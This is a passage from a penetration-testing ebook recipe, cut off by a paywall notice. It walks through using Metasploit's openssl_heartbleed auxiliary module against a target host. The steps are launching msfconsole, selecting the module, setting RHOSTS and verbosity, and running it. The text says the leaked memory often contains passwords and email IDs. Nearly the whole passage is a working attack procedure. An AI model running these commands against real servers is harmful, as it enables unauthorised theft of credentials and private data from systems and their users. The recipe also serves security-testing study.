How to do it...

Let's perform the following steps:

  1. We start msfconsole by typing this:
msfconsole  

The output of the preceding command is shown in the following screenshot:

  1. Search for the heartbleed auxiliary using the following command:
search heartbleed  

The output of the preceding command is shown in the following screenshot:

  1. Use auxiliary with the following command:
use auxiliary/scanner/ssl/openssl_heartbleed
  1. View the options using the following command:
show options  

The output of the preceding command is shown in the following screenshot:

  1. Set the RHOSTS to our target IP using the following command:
set RHOSTS x.x.x.x  
  1. Set the verbosity to true using the following command:
set verbose true  
  1. Type run and we should now see the data in; this data often contains sensitive information, such as passwords and email IDs:

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
18.217.203.172